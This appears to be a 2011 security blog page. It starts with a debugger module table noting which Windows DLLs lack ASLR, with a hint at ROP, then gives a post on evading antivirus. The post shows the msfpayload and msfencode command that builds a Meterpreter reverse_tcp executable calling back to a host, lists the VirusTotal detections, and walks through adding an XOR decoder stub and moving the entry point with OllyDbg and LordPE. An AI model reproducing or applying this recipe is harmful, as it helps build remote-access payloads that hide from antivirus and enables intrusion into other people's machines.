0BADF00D      yes   | 0x73A20000 | 0x73A29000 | 0x00009000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - HID.DLL : C:\Windows\system32\HID.DLL
0BADF00D      yes   | 0x739E0000 | 0x73A19000 | 0x00039000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - MMDevApi.dll : C:\Windows\System32\MMDevApi.dll
0BADF00D      yes   | 0x71E20000 | 0x71E4E000 | 0x0002E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - QAgent.dll : C:\Windows\System32\QAgent.dll
0BADF00D      yes   | 0x65980000 | 0x65A63000 | 0x000E3000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - FXSRESM.DLL : C:\Windows\system32\FXSRESM.DLL
0BADF00D      yes   | 0x751B0000 | 0x751D7000 | 0x00027000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - CFGMGR32.dll : C:\Windows\system32\CFGMGR32.dll
0BADF00D      yes   | 0x74850000 | 0x74894000 | 0x00044000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - dnsapi.DLL : C:\Windows\system32\dnsapi.DLL
0BADF00D      yes   | 0x6B4B0000 | 0x6B514000 | 0x00064000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - imapi2.dll : C:\Windows\system32\imapi2.dll
0BADF00D      yes   | 0x71EA0000 | 0x71EB6000 | 0x00016000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SYNCENG.dll : C:\Windows\system32\SYNCENG.dll
0BADF00D      yes   | 0x6C050000 | 0x6C0B0000 | 0x00060000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wer.dll : C:\Windows\System32\wer.dll
0BADF00D      yes   | 0x74E30000 | 0x74E4A000 | 0x0001A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SSPICLI.DLL : C:\Windows\system32\SSPICLI.DLL
0BADF00D      yes   | 0x731B0000 | 0x731D5000 | 0x00025000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - POWRPROF.dll : C:\Windows\system32\POWRPROF.dll
0BADF00D      yes   | 0x6D870000 | 0x6D89B000 | 0x0002B000 |   yes   | yes |    yes   |   NO   | 8.00.7600.16700 - ieproxy.dll : C:\Program Files\Internet Explorer\ieproxy.dll
0BADF00D      yes   | 0x6BF10000 | 0x6BF1F000 | 0x0000F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - WSCAPI.dll : C:\Windows\System32\WSCAPI.dll
0BADF00D      yes   | 0x75790000 | 0x758C5000 | 0x00135000 |   yes   | yes |    yes   |   yes | 8.00.7600.16385 - urlmon.dll : C:\Windows\system32\urlmon.dll
0BADF00D      NO    | 0x05940000 | 0x0594E000 | 0x0000E000 |   yes   | NO   |    NO    |   NO   | 1.6.11.20210 - TortoiseStub.dll : C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll
0BADF00D      yes   | 0x74F10000 | 0x74F39000 | 0x00029000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - WINSTA.dll : C:\Windows\System32\WINSTA.dll
0BADF00D      yes   | 0x6D0D0000 | 0x6D4DF000 | 0x0040F000 |   yes   | yes |    NO    |   NO   | 14.0.4738.1000 - office.odf : C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf
0BADF00D      yes   | 0x6DB50000 | 0x6DBB4000 | 0x00064000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - dxp.dll : C:\Windows\system32\dxp.dll
0BADF00D      yes   | 0x75620000 | 0x756F4000 | 0x000D4000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - kernel32.dll : C:\Windows\system32\kernel32.dll
0BADF00D      yes   | 0x74EA0000 | 0x74EAC000 | 0x0000C000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - CRYPTBASE.dll : C:\Windows\system32\CRYPTBASE.dll
0BADF00D      yes   | 0x76E00000 | 0x76F3C000 | 0x0013C000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll
0BADF00D      yes   | 0x75AE0000 | 0x75AF9000 | 0x00019000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - sechost.dll : C:\Windows\SYSTEM32\sechost.dll
0BADF00D      yes   | 0x6D630000 | 0x6D6D3000 | 0x000A3000 |   yes   | yes |    yes   |   yes | 9.00.30729.4974 - MSVCR90.dll : C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCR90.dll
0BADF00D      yes   | 0x6D600000 | 0x6D62B000 | 0x0002B000 |   yes   | yes |    yes   |   yes | 9.00.30729.4974 - ATL90.DLL : C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4974_none_51cdc180bbe4500f\ATL90.DLL
0BADF00D      yes   | 0x6EAE0000 | 0x6EB0C000 | 0x0002C000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - msutb.dll : C:\Windows\system32\msutb.dll
0BADF00D      yes   | 0x73A50000 | 0x73A59000 | 0x00009000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - hcproviders.dll : C:\Windows\System32\hcproviders.dll
0BADF00D      yes   | 0x73A60000 | 0x73A67000 | 0x00007000 |   yes   | yes |    yes   |   yes | 5.0.7600.16385 - msiltcfg.dll : C:\Windows\system32\msiltcfg.dll
0BADF00D      yes   | 0x75470000 | 0x75564000 | 0x000F4000 |   yes   | yes |    yes   |   yes | 8.00.7600.16385 - WININET.dll : C:\Windows\system32\WININET.dll
0BADF00D      yes   | 0x00B80000 | 0x00E01000 | 0x00281000 |   yes   | yes |    NO    |   yes | 6.1.7600.16385 - explorer.exe : C:\Windows\explorer.exe
0BADF00D      NO    | 0x10000000 | 0x10012000 | 0x00012000 |   yes   | NO   |    NO    |   NO   | 0.14.4 - intl3_tsvn.dll : C:\Program Files\TortoiseSVN\bin\intl3_tsvn.dll
0BADF00D      yes   | 0x62890000 | 0x62A9E000 | 0x0020E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SyncCenter.dll : C:\Windows\System32\SyncCenter.dll
0BADF00D      yes   | 0x6C350000 | 0x6C37E000 | 0x0002E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - shdocvw.dll : C:\Windows\System32\shdocvw.dll
0BADF00D      yes   | 0x758D0000 | 0x758D5000 | 0x00005000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - PSAPI.DLL : C:\Windows\system32\PSAPI.DLL
0BADF00D      yes   | 0x75AC0000 | 0x75ADF000 | 0x0001F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - IMM32.dll : C:\Windows\system32\IMM32.dll
0BADF00D      yes   | 0x73500000 | 0x7350D000 | 0x0000D000 |   yes   | yes |    NO    |   NO   | 14.0.4750.1000 - MSOXMLMF.DLL : C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
0BADF00D      yes   | 0x6F670000 | 0x6F67B000 | 0x0000B000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - cscapi.dll : C:\Windows\system32\cscapi.dll
0BADF00D      yes   | 0x73CF0000 | 0x73D30000 | 0x00040000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - UxTheme.dll : C:\Windows\system32\UxTheme.dll
0BADF00D      yes   | 0x71400000 | 0x7141C000 | 0x0001C000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - IPHLPAPI.DLL : C:\Windows\System32\IPHLPAPI.DLL
0BADF00D      yes   | 0x71D40000 | 0x71DF7000 | 0x000B7000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - BatMeter.dll : C:\Windows\system32\BatMeter.dll
0BADF00D      yes   | 0x76F40000 | 0x76F4A000 | 0x0000A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - LPK.dll : C:\Windows\system32\LPK.dll
0BADF00D      yes   | 0x6E970000 | 0x6E99B000 | 0x0002B000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - PortableDeviceTypes.dll : C:\Windows\system32\PortableDeviceTypes.dll
0BADF00D      NO    | 0x05960000 | 0x05978000 | 0x00018000 |   yes   | NO   |    NO    |   NO   | 1.1.1.19039 - TortoiseOverlays.dll : C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
0BADF00D      yes   | 0x74F50000 | 0x74F5B000 | 0x0000B000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - profapi.dll : C:\Windows\system32\profapi.dll
0BADF00D      yes   | 0x71020000 | 0x71032000 | 0x00012000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - dhcpcsvc.DLL : C:\Windows\system32\dhcpcsvc.DLL
0BADF00D      yes   | 0x043F0000 | 0x04406000 | 0x00016000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - thumbcache.dll : C:\Windows\system32\thumbcache.dll
0BADF00D      yes   | 0x73E70000 | 0x7400E000 | 0x0019E000 |   yes   | yes |    yes   |   yes | 6.10 - comctl32.dll : C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
0BADF00D      yes   | 0x73E50000 | 0x73E60000 | 0x00010000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - Syncreg.dll : C:\Windows\system32\Syncreg.dll
0BADF00D      yes   | 0x6C0B0000 | 0x6C328000 | 0x00278000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - gameux.dll : C:\Windows\System32\gameux.dll
0BADF00D      yes   | 0x759F0000 | 0x75ABC000 | 0x000CC000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - MSCTF.dll : C:\Windows\system32\MSCTF.dll
0BADF00D      yes   | 0x65D40000 | 0x65EEE000 | 0x001AE000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - pnidui.dll : C:\Windows\System32\pnidui.dll
0BADF00D      yes   | 0x73270000 | 0x73280000 | 0x00010000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - nlaapi.dll : C:\Windows\System32\nlaapi.dll
0BADF00D      yes   | 0x74F40000 | 0x74F4E000 | 0x0000E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - RpcRtRemote.dll : C:\Windows\system32\RpcRtRemote.dll
0BADF00D      yes   | 0x753C0000 | 0x7540E000 | 0x0004E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - GDI32.dll : C:\Windows\system32\GDI32.dll
0BADF00D      yes   | 0x74750000 | 0x7475E000 | 0x0000E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - DEVRTL.dll : C:\Windows\system32\DEVRTL.dll
0BADF00D      yes   | 0x721B0000 | 0x721D5000 | 0x00025000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - cscobj.dll : C:\Windows\System32\cscobj.dll
0BADF00D      yes   | 0x71F40000 | 0x71F8D000 | 0x0004D000 |   yes   | yes |    yes   |   yes | 7.00.7600.16385 - srchadmin.dll : C:\Windows\System32\srchadmin.dll
0BADF00D      yes   | 0x6D7E0000 | 0x6D82F000 | 0x0004F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - hgcpl.dll : C:\Windows\System32\hgcpl.dll
0BADF00D      yes   | 0x6AF20000 | 0x6B160000 | 0x00240000 |   yes   | yes |    yes   |   yes | 5.0.7600.16385 - msi.dll : C:\Windows\system32\msi.dll
0BADF00D      yes   | 0x75060000 | 0x7517C000 | 0x0011C000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - CRYPT32.dll : C:\Windows\system32\CRYPT32.dll
0BADF00D      yes   | 0x6E6E0000 | 0x6E84F000 | 0x0016F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - EXPLORERFRAME.dll : C:\Windows\system32\EXPLORERFRAME.dll
0BADF00D      yes   | 0x71CD0000 | 0x71D34000 | 0x00064000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - prnfldr.dll : C:\Windows\system32\prnfldr.dll
0BADF00D      yes   | 0x68BD0000 | 0x6964F000 | 0x00A7F000 |   yes   | yes |    yes   |   yes | 8.00.7600.16385 - ieframe.dll : C:\Windows\System32\ieframe.dll
0BADF00D      yes   | 0x71A30000 | 0x71A3C000 | 0x0000C000 |   yes   | yes |    yes   |   yes | 7.00.7600.16385 - mssprxy.dll : C:\Windows\system32\mssprxy.dll
0BADF00D      yes   | 0x74340000 | 0x7434D000 | 0x0000D000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - WTSAPI32.dll : C:\Windows\system32\WTSAPI32.dll
0BADF00D      yes   | 0x6E240000 | 0x6E2CE000 | 0x0008E000 |   yes   | yes |    yes   |   yes | 9.00.30729.4974 - MSVCP90.dll : C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCP90.dll
0BADF00D      yes   | 0x72480000 | 0x724A2000 | 0x00022000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - EhStorAPI.dll : C:\Windows\system32\EhStorAPI.dll
0BADF00D      yes   | 0x6C380000 | 0x6C3CE000 | 0x0004E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - actxprxy.dll : C:\Windows\system32\actxprxy.dll
0BADF00D      yes   | 0x723A0000 | 0x723F8000 | 0x00058000 |   yes   | yes |    yes   |   NO   | 6.1.7600.16385 - tiptsf.dll : C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
0BADF00D      yes   | 0x74570000 | 0x74587000 | 0x00017000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - USERENV.dll : C:\Windows\system32\USERENV.dll
0BADF00D      yes   | 0x749D0000 | 0x749E6000 | 0x00016000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - CRYPTSP.dll : C:\Windows\system32\CRYPTSP.dll
0BADF00D      yes   | 0x6FA40000 | 0x6FA56000 | 0x00016000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - Wlanapi.dll : C:\Windows\system32\Wlanapi.dll
0BADF00D      yes   | 0x6BF40000 | 0x6BF7A000 | 0x0003A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - FXSAPI.dll : C:\Windows\system32\FXSAPI.dll
0BADF00D      NO    | 0x6EE60000 | 0x6EE8F000 | 0x0002F000 |   yes   | NO   |    NO    |   NO   | 1.3.9 - libaprutil_tsvn.dll : C:\Program Files\TortoiseSVN\bin\libaprutil_tsvn.dll
0BADF00D      yes   | 0x71E00000 | 0x71E08000 | 0x00008000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - npmproxy.dll : C:\Windows\System32\npmproxy.dll
0BADF00D      yes   | 0x73990000 | 0x739BF000 | 0x0002F000 |   yes   | yes |    yes   |   yes | 1.3.1000.0 - XmlLite.dll : C:\Windows\System32\XmlLite.dll
0BADF00D      yes   | 0x74E50000 | 0x74E9B000 | 0x0004B000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - apphelp.dll : C:\Windows\system32\apphelp.dll
0BADF00D      yes   | 0x6C3E0000 | 0x6C44A000 | 0x0006A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - cscui.dll : C:\Windows\System32\cscui.dll
0BADF00D      yes   | 0x73760000 | 0x73769000 | 0x00009000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - netutils.dll : C:\Windows\system32\netutils.dll
0BADF00D      yes   | 0x71EC0000 | 0x71EE9000 | 0x00029000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - syncui.dll : C:\Windows\system32\syncui.dll
0BADF00D      yes   | 0x66EA0000 | 0x66F13000 | 0x00073000 |   yes   | yes |    yes   |   NO   | 1.0.2498.0 - shellext.dll : c:\PROGRA~1\MIF707~1\shellext.dll
0BADF00D      yes   | 0x73A70000 | 0x73A9F000 | 0x0002F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - DUser.dll : C:\Windows\system32\DUser.dll
0BADF00D      yes   | 0x75250000 | 0x75256000 | 0x00006000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - NSI.dll : C:\Windows\system32\NSI.dll
0BADF00D      yes   | 0x6BF80000 | 0x6BFAB000 | 0x0002B000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - provsvc.dll : C:\Windows\System32\provsvc.dll
0BADF00D      yes   | 0x76BB0000 | 0x76BF5000 | 0x00045000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - WLDAP32.dll : C:\Windows\system32\WLDAP32.dll
0BADF00D      yes   | 0x6C450000 | 0x6CCB4000 | 0x00864000 |   yes   | yes |    yes   |   NO   | 14.0.4761.1000 - GrooveIntlResource.dll : C:\PROGRA~1\MICROS~3\Office14\1033\GrooveIntlResource.dll
0BADF00D      yes   | 0x751E0000 | 0x7522A000 | 0x0004A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - KERNELBASE.dll : C:\Windows\system32\KERNELBASE.dll
0BADF00D      yes   | 0x74EB0000 | 0x74F0F000 | 0x0005F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SXS.DLL : C:\Windows\system32\SXS.DLL
0BADF00D      yes   | 0x6CCC0000 | 0x6D0CB000 | 0x0040B000 |   yes   | yes |    yes   |   NO   | 14.0.4761.1000 - GROOVEEX.DLL : C:\PROGRA~1\MICROS~3\Office14\GROOVEEX.DLL
0BADF00D      yes   | 0x71FF0000 | 0x72002000 | 0x00012000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wercplsupport.dll : C:\Windows\System32\wercplsupport.dll
0BADF00D      yes   | 0x70FA0000 | 0x70FA6000 | 0x00006000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wlanutil.dll : C:\Windows\system32\wlanutil.dll
0BADF00D      yes   | 0x72D90000 | 0x72D9D000 | 0x0000D000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - dhcpcsvc6.DLL : C:\Windows\system32\dhcpcsvc6.DLL
0BADF00D      yes   | 0x6BAD0000 | 0x6BB59000 | 0x00089000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - PortableDeviceApi.dll : C:\Windows\system32\PortableDeviceApi.dll
0BADF00D      yes   | 0x72DD0000 | 0x72F27000 | 0x00157000 |   yes   | yes |    yes   |   yes | 6.30.7600.16385 - msxml6.dll : C:\Windows\System32\msxml6.dll
0BADF00D      yes   | 0x74410000 | 0x74419000 | 0x00009000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - VERSION.dll : C:\Windows\system32\VERSION.dll
0BADF00D      yes   | 0x76F60000 | 0x77000000 | 0x000A0000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - ADVAPI32.dll : C:\Windows\system32\ADVAPI32.dll
0BADF00D      yes   | 0x75B80000 | 0x75D1D000 | 0x0019D000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SETUPAPI.dll : C:\Windows\system32\SETUPAPI.dll
0BADF00D      yes   | 0x759B0000 | 0x759E5000 | 0x00035000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - WS2_32.dll : C:\Windows\system32\WS2_32.dll
0BADF00D      yes   | 0x73B60000 | 0x73CF0000 | 0x00190000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - gdiplus.dll : C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
0BADF00D      yes   | 0x69A80000 | 0x69B30000 | 0x000B0000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - bthprops.cpl : C:\Windows\System32\bthprops.cpl
0BADF00D      NO    | 0x6EEC0000 | 0x6EEE2000 | 0x00022000 |   yes   | NO   |    NO    |   NO   | 1.3.8 - libapr_tsvn.dll : C:\Program Files\TortoiseSVN\bin\libapr_tsvn.dll
0BADF00D      yes   | 0x74DA0000 | 0x74DB9000 | 0x00019000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - srvcli.dll : C:\Windows\system32\srvcli.dll
0BADF00D      yes   | 0x71F90000 | 0x71FBD000 | 0x0002D000 |   yes   | yes |    yes   |   NO   | 3.91.2 - rarext.dll : C:\Program Files\WinRAR\rarext.dll
0BADF00D      yes   | 0x73690000 | 0x736C6000 | 0x00036000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - AUDIOSES.DLL : C:\Windows\system32\AUDIOSES.DLL
0BADF00D      yes   | 0x73AA0000 | 0x73B52000 | 0x000B2000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - DUI70.dll : C:\Windows\system32\DUI70.dll
0BADF00D      yes   | 0x6B550000 | 0x6B6E8000 | 0x00198000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - NetworkExplorer.dll : C:\Windows\system32\NetworkExplorer.dll
0BADF00D      yes   | 0x020A0000 | 0x0216A000 | 0x000CA000 |   yes   | NO   |    NO    |   NO   | 1.6.11.20210 - TortoiseSVN.dll : C:\Program Files\TortoiseSVN\bin\TortoiseSVN.dll
0BADF00D      yes   | 0x734B0000 | 0x734D1000 | 0x00021000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - ntmarta.dll : C:\Windows\system32\ntmarta.dll
0BADF00D      yes   | 0x04320000 | 0x04334000 | 0x00014000 |   NO    | NO   |    NO    |   NO   | 4.65 - 7-zip.dll : C:\Program Files\7-Zip\7-zip.dll
0BADF00D      yes   | 0x75DB0000 | 0x75E5C000 | 0x000AC000 |   yes   | yes |    yes   |   yes | 7.0.7600.16385 - msvcrt.dll : C:\Windows\system32\msvcrt.dll
0BADF00D      yes   | 0x73E60000 | 0x73E66000 | 0x00006000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - IconCodecService.dll : C:\Windows\system32\IconCodecService.dll
0BADF00D      yes   | 0x6AC60000 | 0x6AD1A000 | 0x000BA000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - Actioncenter.dll : C:\Windows\System32\Actioncenter.dll
0BADF00D      yes   | 0x75E60000 | 0x75EFD000 | 0x0009D000 |   yes   | yes |    yes   |   yes | 1.0626.7600.16385 - USP10.dll : C:\Windows\system32\USP10.dll
0BADF00D      yes   | 0x74E10000 | 0x74E18000 | 0x00008000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - Secur32.dll : C:\Windows\system32\Secur32.dll
0BADF00D      yes   | 0x75230000 | 0x75242000 | 0x00012000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - DEVOBJ.dll : C:\Windows\system32\DEVOBJ.dll
0BADF00D      yes   | 0x6E540000 | 0x6E591000 | 0x00051000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - WINSPOOL.DRV : C:\Windows\system32\WINSPOOL.DRV
0BADF00D      yes   | 0x71AA0000 | 0x71AE8000 | 0x00048000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wwanapi.dll : C:\Windows\system32\wwanapi.dll
0BADF00D      yes   | 0x6AD20000 | 0x6AE3A000 | 0x0011A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wscui.cpl : C:\Windows\System32\wscui.cpl
0BADF00D      yes   | 0x74770000 | 0x747AB000 | 0x0003B000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - rsaenh.dll : C:\Windows\system32\rsaenh.dll
0BADF00D      yes   | 0x72510000 | 0x72775000 | 0x00265000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - netshell.dll : C:\Windows\System32\netshell.dll
0BADF00D      yes   | 0x73700000 | 0x7370E000 | 0x0000E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - AltTab.dll : C:\Windows\System32\AltTab.dll
0BADF00D      yes   | 0x75700000 | 0x7578F000 | 0x0008F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16567 - OLEAUT32.dll : C:\Windows\system32\OLEAUT32.dll
0BADF00D      yes   | 0x042D0000 | 0x042E7000 | 0x00017000 |   NO    | NO   |    NO    |   NO   | 0.1 - NppShell_01.dll : C:\Program Files\Notepad++\NppShell_01.dll
0BADF00D      yes   | 0x75570000 | 0x75611000 | 0x000A1000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - RPCRT4.dll : C:\Windows\system32\RPCRT4.dll
0BADF00D      yes   | 0x72FC0000 | 0x72FD4000 | 0x00014000 |   yes   | yes |    yes   |   yes | 3.05.2284 - ATL.DLL : C:\Windows\system32\ATL.DLL
0BADF00D      yes   | 0x73750000 | 0x7375F000 | 0x0000F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wkscli.dll : C:\Windows\system32\wkscli.dll
0BADF00D      yes   | 0x6E2F0000 | 0x6E34A000 | 0x0005A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - netprofm.dll : C:\Windows\System32\netprofm.dll
0BADF00D      yes   | 0x73530000 | 0x73568000 | 0x00038000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SndVolSSO.DLL : C:\Windows\system32\SndVolSSO.DLL
0BADF00D      yes   | 0x72380000 | 0x72397000 | 0x00017000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - QUtil.dll : C:\Windows\System32\QUtil.dll
0BADF00D      yes   | 0x74110000 | 0x742C7000 | 0x001B7000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - authui.dll : C:\Windows\system32\authui.dll
0BADF00D      yes   | 0x73E30000 | 0x73E42000 | 0x00012000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SAMLIB.dll : C:\Windows\system32\SAMLIB.dll
0BADF00D      yes   | 0x6AE40000 | 0x6AEAF000 | 0x0006F000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - ntshrui.dll : C:\Windows\system32\ntshrui.dll
0BADF00D      yes   | 0x76F50000 | 0x76F53000 | 0x00003000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - Normaliz.dll : C:\Windows\system32\Normaliz.dll
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------

Interesting also, i didn't see it before, tortoise svn extensions, 7zip and notepad++ are with no aslr enabled, rop anyone ? :)

meterpreter xor for further av bypass

2011-01-15T11:54:00.000+02:00

Still on holidays here, and in between sake, beer and shochu i found some time to read and check some things that i wanted to do for some time now. One of that was how to implement a simple binary xor in an .exe file especially for meterpreter. Meterpreter is great tool but is being detected from antivirus engines and that makes it difficult to use it as a standard payload.

Simple way to create one meterpreter binary that will connect back on ip 192.168.11.7:

C:\framework\msf3>ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.7 R | ruby msfencode -t exe -o meter_rever_tcp_192.exe -e x86/shikata_ga_nai
-c 2
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

C:\framework\msf3>

Virustotal result on the binary:

Result:

15/ 37 (40.5%) HASH 0f5298c9572ed0db233b2632aa6068a7

With the following av engines detecting the binary:

Antivirus   Version   Last Update   Result
AhnLab-V3   2011.01.15.00   2011.01.14   Trojan/Win32.Shell
AntiVir       7.11.1.144   2011.01.14   TR/Crypt.EPACK.Gen2
BitDefender   7.2       2011.01.15   Backdoor.Shell.AC
Command       5.2.11.5   2011.01.14   W32/Swrort.A.gen!Eldorado
eTrust-Vet   36.1.8100   2011.01.14   Win32/Swrort.A!generic
F-Prot       4.6.2.117   2011.01.14   W32/Swrort.A.gen!Eldorado   -
GData       21       2011.01.15   Backdoor.Shell.AC
K7AntiVirus   9.75.3548   2011.01.14   Riskware
Microsoft   1.6402       2011.01.14   Trojan:Win32/Swrort.A
NOD32       5788       2011.01.14   a variant of Win32/Rozena.AA
nProtect   2011-01-14.01   2011.01.14   Backdoor.Shell.AC
Panda       10.0.2.7   2011.01.14   Suspicious file
Sophos       4.61.0   2011.01.14   Mal/Swrort-C
SUPERAntiSpyware   4.40.0.1006   2011.01.15   Trojan.Backdoor-PoisonIvy
VirusBuster       13.6.147.0   2011.01.14   Trojan.Rosena.Gen.1

Manual packing of the binary can be done with many ways, the simplest way should be to XOR the data of the binary file. The process is easy you just have to do it once and see it working, from there someone can change the xor function to different more complicated methods in order to achieve better results.

Two tools will be used for the process, one is ollydbg ( http://www.ollydbg.de/ ) and the other lordpe ( http://www.woodmann.com/collaborative/tools/index.php/LordPE ).

Starting the process, we fire up ollydbg and load our binary file,

Some things to observe here, the OEP, original entry point of the executable module, is at 00406D42. Also checking near the end of the file we are looking to find a place for the new instructions. We are actually looking for a series of DB 00, at least 10 lines will do the work, if you don't have the space you can always add it using a hex editor.

For the binary file that I' m using a place around 0040BF60 seems nice to place the extra code. The instructions will be,

mov ecx, "address of our code" - "original entry point"
mov eax, "original entry point"
xor byte [eax], 0A <- here the 0A acts as an encryption key and can be anything that you like
inc eax
dec ecx
jnz "our xor address"
push "original entry point"
retn

For the binary file that i'm working with instructions are exactly like this:

mov ecx, 521E
mov eax, 00406D42
xor byte [eax], 0A
inc eax
dec ecx
jnz 0040bf6a
push 00406D42
retn

In order to save the modifications, right click, select copy to executable, all modifications

And again choose copy all in the next dialog box. Finally right click in the new window and choose save file.

Input a new filename and we are done for the moment with ollydbg. The next step is to instruct our file to execute our code before anything else. In order to achieve this we need to change the OEP ( original entry point ) to the first address of our instruction set ( for my file the address is 0040BF60).

LordPE will help us to make this change. All we actually need to do is to calculate the new OEP based on the Image Base and the new entry point. Loading LordPE we choose Pe Editor and we select our new created file.

Originally we have the entry point at 6D42 with our Base Image at 40000, ( OEP loading the file at ollydbg was at 00406D42 )

We need the OEP to be placed at 0040BF60, so new entry point - base image ( 0040BF60 - 0040000 = BF60 )

After changing the EntryPoint we click Save, Ok and we close LordPE.

Back at ollydbg we load the new file, and we can see that the program now is starting at our first instruction.

